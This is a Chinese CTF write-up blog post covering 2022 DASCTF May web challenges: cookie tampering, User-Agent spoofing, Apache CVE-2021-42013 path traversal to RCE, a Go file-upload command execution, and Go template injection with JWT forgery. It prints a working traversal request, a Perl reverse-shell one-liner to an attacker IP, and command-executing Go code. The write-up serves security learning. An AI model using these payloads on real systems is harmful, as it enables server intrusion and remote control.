2022DASCTF MAY 出题人挑战赛 web复现

已于 2022-05-24 08:37:40 修改
阅读量979 收藏 2
点赞数 4
分类专栏: 刷题+WP 文章标签: 前端 服务器 web安全 go golang
于 2022-05-23 20:41:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51295677/article/details/124921391
版权

自闭了,抱着团队人的大腿就差最后一道cms的题就AK所有web了,但是中途给他们弹一个题目的shell过程中把我题目的弹过去最后串交了个flag,两个队的成绩全被清零了,555。

Power Cookie

点击按钮抓个包看看数据

Set-Cookie默认为admin=0,我们自己设置一个admin=1cookie值即可。

简简单单。

魔法浏览器

看看源代码,

有一串utf-8的编码,把它放入python中执行以下即可(python默认utf-8编码)

str1="\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30 \x28\x57\x69\x6e\x64\x6f\x77\x73 \x4e\x54 \x31\x30\x2e\x30\x3b \x57\x69\x6e\x36\x34\x3b \x78\x36\x34\x29 \x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36 \x28\x4b\x48\x54\x4d\x4c\x2c \x6c\x69\x6b\x65 \x47\x65\x63\x6b\x6f\x29 \x4d\x61\x67\x69\x63\x2f\x31\x30\x30\x2e\x30\x2e\x34\x38\x39\x36\x2e\x37\x35"
print(str1)

这串字符就是用来伪装User-Agent的浏览器,抓个包修改一下数据

 也是简简单单。

getme

看看源码

给了个网站当前路径即网站根目录,除了知道它是apache环境以外没有什么思路,所以扫一下这个网站。

index.html就默认网站的页面没什么用,看到一个有意思的玩意儿,/cgi-bin/test-cgi,虽然是500状态无法访问,但是也可以从这里找一个突破口,经过在网上大量的搜索以及和队友的交流,最后得知这是一道CVE-2021-42013的原题,找到原exp拿到打入即可,至于是什么原理,大火可以自行百度。

GET :

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

POST:

echo Content-Type: text/plain; echo;ls /

可以用如下命令进行shell弹取

perl -e 'use Socket;$i="you_ip";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

也可以直接进行flag的查找,当然表面的这个flag是假的,真正的flag需要自己去找,一开始有点懵,还以为flag在网站根目录,甚至想过是不是suid提权,结果提出来就一个su可以用,也就放弃了,最后发现

这似乎不是根目录下默认的文件所以我一层一层的剥下去

好家伙,套了四层,最后也是顺利读到flag,脑子瓦特了flag就在眼前找flag还会卡。

当时我和团队的人也是在这里串交flag了,寄。

hackme

 还是一样,正常界面

 

有八个可以点击的,我们一个一个的点击查看有没有什么敏感信息。

processes

 点击进入看到:

 一个简单的进程信息,没什么收获,看看下一个

log

点击进入看到:

 还是没有什么收获,有一种奇怪的感觉,但是说不出,继续看下面。

whoami

点击进入看到:

 一样的,继续往下看

whereami

看到这里,那种感觉快到瓶颈了,说不出来,所以说有没有一种可能每一个链接中有一个文件,而每一个对应的文件中执行了一条命令。像上面的whoami、pwd等等。如果不确定再继续看下去。

 uptime

基本可以确定是这样的了,flag点都不用点就知道是个假的,最后看一个关键的信息,那就是users

 这个提示非常的关键,doesn't seem to be users.go???即users.go文件找不到,也就是那些链接都是点击后在文件名后加.go后缀。那么有意思了,我们上面执行命令的那些文件说不定就都是go语言写的。最后还有一个提示,

Upload  .go,即我们需要上传一个go文件,这一下思路清晰了,我们需要上传一个users.go的脚本,当我们点击users会自动读取道go文件解析并执行,很不幸我并不会go语言,所以脚本是从我队友那拿的(他也是网上找的哈哈哈); 脚本如下

package main

import (
	"fmt"
	"os/exec"
)

func main() {
    Command("ls /")
}

func Command(cmd string) error {
	c := exec.Command("bash", "-c", cmd)
	output, err := c.CombinedOutput()
	fmt.Println(string(output))
	return err
}

命令执行,用ls 查看根目录下的文件夹以及文件,把该内容写入一个user.go的文件中,再通过文件上传将其上传上去,最后再点击一下users,即可得到命令执行过后的数据

 最后发现flag,用cat /flag 代替上面语句中的ls /即可查找到flag。所以这个题看似其实不完全考到go即使不是很懂go语言,主要能在百度找到一个脚本就可以解决。


fxxkgo

和上一题鸡肋的go相比比较,这一题才是真真正正的考到了go语言,考到了go的代码审计,go中存在的ssti,go中的JWT伪造。这种题目其实我本来是做不出来,但是最后还是做出来了,原因是这个题是原题([LineCTF2022]gotm),被抄下来的原题除了JWT伪造的密匙不同以及原题是GET请求,这个题目用的是POST请求以外,便没有什么不同的了。

题目给了源码

package main

import (
	"encoding/json"
	"fmt"
	"github.com/gin-gonic/gin"
	"github.com/golang-jwt/jwt"
	"os"
	"text/template"
)

type Account struct {
	id         string
	pw         string
	is_admin   bool
	secret_key string
}

type AccountClaims struct {
	Id       string `json:"id"`
	Is_admin bool   `json:"is_admin"`
	jwt.StandardClaims
}

type Resp struct {
	Status bool   `json:"status"`
	Msg    string `json:"msg"`
}

type TokenResp struct {
	Status bool   `json:"status"`
	Token  string `json:"token"`
}

var acc []Account
var secret_key = os.Getenv("KEY")
var flag = os.Getenv("FLAG")
var admin_id = os.Getenv("ADMIN_ID")
var admin_pw = os.Getenv("ADMIN_PW")

func get_account(uid string) Account {
	for i := range acc {
		if acc[i].id == uid {
			return acc[i]
		}
	}
	return Account{}
}
func clear_account() {
	acc = acc[:1]
}

func jwt_encode(id string, is_admin bool) (string, error) {
	claims := AccountClaims{
		id, is_admin, jwt.StandardClaims{},
	}
	token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
	return token.SignedString([]byte(secret_key))
}

func jwt_decode(s string) (string, bool) {
	token, err := jwt.ParseWithClaims(s, &AccountClaims{}, func(token *jwt.Token) (interface{}, error) {
		return []byte(secret_key), nil
	})
	if err != nil {
		fmt.Println(err)
		return "", false
	}
	if claims, ok := token.Claims.(*AccountClaims); ok && token.Valid {
		return claims.Id, claims.Is_admin
	}
	return "", false
}


func rootHandler(c *gin.Context) {
	token := c.GetHeader("X-Token")
	if token != "" {
		id, _ := jwt_decode(token)
		acc := get_account(id)
		tpl, err := template.New("").Parse("Logged in as " + acc.id)
		if err != nil {
		}
		tpl.Execute(c.Writer, &acc)
		return
	} else {

		return
	}
}

func flagHandler(c *gin.Context) {
	token := c.GetHeader("X-Token")
	if token != "" {
		id, is_admin := jwt_decode(token)
		if is_admin == true {
			p := Resp{true, "Hi " + id + ", flag is " + flag}
			res, err := json.Marshal(p)
			if err != nil {
			}
			c.JSON(200, string(res))
			return
		} else {
			c.JSON(403, gin.H{
				"code": 403,
				"status": "error",
			})
			return
		}
	}
}

func authHandler(c *gin.Context) {
	uid := c.PostForm("id")
	upw := c.PostForm("pw")
	if uid == "" || upw == "" {
		return
	}
	if len(acc) > 1024 {
		clear_account()
	}
	user_acc := get_account(uid)
	if user_acc.id != "" && user_acc.pw == upw {
		token, err := jwt_encode(user_acc.id, user_acc.is_admin)
		if err != nil {
			return
		}
		p := TokenResp{true, token}
		res, err := json.Marshal(p)
		if err != nil {
		}
		c.JSON(200, string(res))
		return
	}
	c.JSON(403, gin.H{
		"code": 403,
		"status": "error",
	})
	return
}


func Resist(c *gin.Context){
	uid := c.PostForm("id")
	upw := c.PostForm("pw")
	if uid == "" || upw == "" {
		return
	}
	if get_account(uid).id != "" {
		c.JSON(403, gin.H{
			"code": 403,
			"status": "error",
		})
		return
	}
	if len(acc) > 4 {
		clear_account()
	}
	new_acc := Account{uid, upw, false, secret_key}
	acc = append(acc, new_acc)

	p := Resp{true, ""}
	res, err := json.Marshal(p)
	if err != nil {
	}
	c.JSON(200, string(res))
	return
}
func index(c *gin.Context) {
	c.JSON(200,gin.H{
		"msg": "Hello World",
	})
}

func main()  {
	admin := Account{admin_id, admin_pw, true, secret_key}
	acc = append(acc, admin)
	r := gin.Default()
	r.GET("/",index)
	r.POST("/", rootHandler)
	r.POST("/flag", flagHandler)
	r.POST("/auth", authHandler)
	r.POST("/register", Resist)
	r.Run(":80")

}

根据主函数我们可以得知它有5个路由

func main()  {
	admin := Account{admin_id, admin_pw, true, secret_key}
	acc = append(acc, admin)
	r := gin.Default()
	r.GET("/",index)
	r.POST("/", rootHandler)
	r.POST("/flag", flagHandler)
	r.POST("/auth", authHandler)
	r.POST("/register", Resist)
	r.Run(":80")

}

根目录的GET请求和POST请求进入的路由不相同,实现的功能也不同。这个题目其实就是按照路由走一遍然后就可以得到flag了,具体怎么走,看的懂go语言的兄弟可以思考一下,看不懂的我直接讲了,首先我们先去分析五个路由对应的函数实现了什么功能

//GET请求根目录的实现
func index(c *gin.Context) {
	c.JSON(200,gin.H{
		"msg": "Hello World",
	})
}
//根目录POST请求实现功能
func rootHandler(c *gin.Context) {
	token := c.GetHeader("X-Token")
	if token != "" {
		id, _ := jwt_decode(token)
		acc := get_account(id)
		tpl, err := template.New("").Parse("Logged in as " + acc.id) //这个点存在ssti漏洞
		if err != nil {
		}
		tpl.Execute(c.Writer, &acc)
		return
	} else {

		return
	}
}
//根目录下的flag POST请求实现的功能
func flagHandler(c *gin.Context) {
	token := c.GetHeader("X-Token")
	if token != "" {
		id, is_admin := jwt_decode(token)
		if is_admin == true {
			p := Resp{true, "Hi " + id + ", flag is " + flag}
			res, err := json.Marshal(p)
			if err != nil {
			}
			c.JSON(200, string(res))
			return
		} else {
			c.JSON(403, gin.H{
				"code": 403,
				"status": "error",
			})
			return
		}
	}
}
//根目录下auth POST请求实现的功能
func authHandler(c *gin.Context) {
	uid := c.PostForm("id")
	upw := c.PostForm("pw")
	if uid == "" || upw == "" {
		return
	}
	if len(acc) > 1024 {
		clear_account()
	}
	user_acc := get_account(uid)
	if user_acc.id != "" && user_acc.pw == upw {
		token, err := jwt_encode(user_acc.id, user_acc.is_admin)
		if err != nil {
			return
		}
		p := TokenResp{true, token}
		res, err := json.Marshal(p)
		if err != nil {
		}
		c.JSON(200, string(res))
		return
	}
	c.JSON(403, gin.H{
		"code": 403,
		"status": "error",
	})
	return
}
//根目录下register POST请求实现的功能
func Resist(c *gin.Context){
	uid := c.PostForm("id")
	upw := c.PostForm("pw")
	if uid == "" || upw == "" {
		return
	}
	if get_account(uid).id != "" {
		c.JSON(403, gin.H{
			"code": 403,
			"status": "error",
		})
		return
	}
	if len(acc) > 4 {
		clear_account()
	}
	new_acc := Account{uid, upw, false, secret_key}
	acc = append(acc, new_acc)

	p := Resp{true, ""}
	res, err := json.Marshal(p)
	if err != nil {
	}
	c.JSON(200, string(res))
	return
}

根据分析register是用来创建用户idpw的,存入开始便已经定义好的结构体中

type Account struct {
	id         string
	pw         string
	is_admin   bool
	secret_key string
}

auth可以获得用户tokenJWT的返回值,所以如果我们能获得JWT的返回值我们想要伪造一个JWT就还需要知道它的密匙,这个密匙怎么获得呢?这就要利用到go中的ssti的漏洞,我当然对这方面的原理不是很清楚,就分享一下解题方法。

第一步先用register,注册一个账号密码

第二步用auth查看路由 

 获得了一个JWT,所以现在需要一个点去搞到密匙,把JWT换上看一下根目录

这就是账号,所以我们可以利用账号进行ssti注入,看别的师傅说正常出牌应该是{{.secret_key}},但是函数root_handler中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空,所以我们利用{{.}}即查看所有内容,最后可以查到密匙。

步骤和上面一样,不过我们需要在register下注册的账号为{{.}}

一样的访问一下auth获得token,再打入其中POST访问根目录

爆出JWT来了,接下来就是JWT的身份伪造 

讲伪造的JWT打入网站,最后再访问一下flag

得到flag了,比较艰辛,但是对go语言更加的了解了。

参考:[LineCTF2022]gotm ( golang SSTI + JWT伪造 )_shu天的博客-CSDN博客

https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp

errorr0
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
lammps-4May2022.tar
07-20
lammps-4May2022.tar
UBUNTU18.04 APACHE2 配置 CGI(http://127.0.0.1/cgi-bin/testcgi.cgi)
2004v2004的专栏
03-24 1130
1.安装apache2 sudo apt update sudo apt install apache2 2.配置cgi apache2所有的配置文件的目录在/etc/apache2/,进入该目录进行相关配置 VirtualBox:/etc/apache2/sites-enabled$ vi 000-default.conf 第一步,进入sites-enabled 编辑000-default.conf,更改为如下所示 注意上图中有删除最下面一行注释,记得删除 第二步,进入mods-enable.
【Linux】【CGI】CGIC库的移植及使用
自然
10-12 1900
CGIC库的移植         CGIC是一个支持CGI开发的开放源码的标准C库,可以免费使用,只需要在开发的站点和程序文档中有个公开声明即可,表明程序使用了CGIC库,用户也可以购买商业授权而无需公开声明。      CGIC能够提供以下功能:    1   分析数据,并自动校正一些有缺陷的浏览器发来的数据;    2   透明接收用GET或 POST方法发来的From数据;
CGI 编程基础
Genven_Liang的博客
10-06 3010
CGI 编程基础 一、简述 记--CGI编程基础,CGI编程简单例子。 例子1:常用参数 例子2:GET、POST请求参数获取、文件上传 例子3:原生AJAXGET、POST请求 例子4:JQueryAJAXGET、POST请求 例子打包:https://wwa.lanzous.com/iGkm...
linux cgi 文件编辑,linux Apache CGI 安装配置_Linux/apache_脚本之家
weixin_30189297的博客
04-29 382
本文假定你已经安装好linux(本文的linux版本为Fedora Core3), 并具有root权限.1,安装apache首先到apache的主页下载最新版本的apache http server,地址为 http://httpd.apache.org/本文写于2006.4.29,apache版本为2.2.0 .如果你也想用这一个版本的话请点击:http://mirror.vmmatrix.ne...
2022DASCTF MAY 出题挑战赛
qq_61620566的博客
05-27 666
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、misc 1.不懂PCB的厨师不是好黑客 2.卡比 二、web 1. 2. 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、misc 1.不懂PCB的厨师不是好黑客 用记事本.
2022DASCTF MAY Power cookie
a1563361185的博客
05-22 393
进入题目场景 如图所示 点击login by guest 得到如图所示 显示游客不可用,再由题目的给出的提示可以知道,只有管理员有资格访问 按F12进入控制台,输入document.cookie查看cookie,得到 (这里本来应当是空格,但我自己写过了所以只改回了0,效果一样的) 输入document.cookie="admin=1".得到管理员 接着刷新界面 得到flag ...
2022DASCTF MAY 出题挑战赛web部分
m0_62422842的博客
05-23 418
前言 这是五月份buu的比赛,当时专心备考,所以没有怎么看,这次就来复现一下比赛中的一些web题吧。 Power Cookie 题目中提到了cookie,那肯定与cookie有关。题目中的信息没有给太多,那就bp抓包看看吧。 抓包分析看出set-cookie中admin为0 什么是set-Cookie?它向客户端发送一个http的cookie。cookie是由服务器发送给游览器的变量。上面是admin=0,我们需要管理员登录则就要admin=1。那这题就明显了。直接改包添加cookie就行了呀
CPHIMS Handbook May 2015_Web
12-14
CPHIMS Handbook May 2015_Web, HIMS指导手册,2015年版本。
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
UL 60335-2-3-2022(May 10, 2022)Household and Similar
11-24
UL 60335-2-3-2022(May 10, 2022)Household and Similar
leetcode卡-May-LeetCodeChallenge-2020:2020年5月LeetCode挑战赛的解决方案合集
07-06
挑战赛的解决方案合集 否 问题链接 使用的算法 使用的数据结构 时间复杂度 空间复杂度 1 二分查找 不适用 O(log(n)) O(1) 2 不适用 哈希表 O(n+m) 上) 3 不适用 哈希表 O(n+m) O(n+m) 4 位操作 不适用 O(1) O(1) 5 ...
CGI漏洞攻击手册
蓝法典的专栏
03-20 8385
在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加...更欢迎任意散播.:)一. phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/e
linux登录系统被拒绝访问权限,linux – (13)权限被拒绝:访问/cgi-bin/test.cgi被拒绝...
weixin_32137855的博客
04-29 804
我第一次尝试CGI脚本,但没有成功.我已经阅读了很多教程,并且可能会在不同的论坛上发帖,但是我无法使其工作.我在Fedora 10机器上使用appache web服务器.我总是有问题[Wed Oct 21 20:47:36 2009] [notice] SELinux policy enabled; httpd running as context unconfined_u:system_r:ht...
Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1721
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag
50个前端实战项目之04:隐藏的搜索小组件
前端开发博客
05-03 1101
大家好,我是宝哥。今天讲50个前端实战项目之04:隐藏的搜索小组件。源码下载地址https://github.com/bradtraversy/50projects50days/tree/master/hidden-search前端实战项目系列正在更新:04/5001:可展开卡片02:进度条03:旋转导航动画04:隐藏的搜索小组件项目介绍本项目演示了一个简洁实用的隐藏式搜索小部件。点击搜索按钮后,...
前端Vue 后端FastApi 跨域 CORS
最新发布
weixin_44656422的博客
05-06 316
前端是localhost:3000,后端是localhost:8000 ,就是跨域了。
java 时间格式2022.03.03转换为 03 may 2013
05-27
你可以使用 Java 的 SimpleDateFormat 类来进行日期格式转换。以下是一个示例代码: ```java import java.text.SimpleDateFormat; import java.util.Date; public class DateConversionExample { public static void main(String[] args) throws Exception { SimpleDateFormat inputFormat = new SimpleDateFormat("yyyy.MM.dd"); Date date = inputFormat.parse("2022.03.03"); SimpleDateFormat outputFormat = new SimpleDateFormat("dd MMM yyyy"); String outputDate = outputFormat.format(date); System.out.println(outputDate); // Output: 03 Mar 2022 } } ``` 在代码中,我们首先创建了一个 SimpleDateFormat 对象来解析输入日期字符串,该字符串的格式为 "yyyy.MM.dd"。然后我们使用 parse() 方法将其转换为 Date 对象。 接下来,我们创建另一个 SimpleDateFormat 对象来格式化输出日期字符串,该字符串的格式为 "dd MMM yyyy"。最后,我们使用 format() 方法将 Date 对象转换为输出日期字符串。 注意:输出日期字符串中的月份缩写是英文的。如果你需要其他语言或其他格式的月份缩写,请自行修改代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

errorr0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值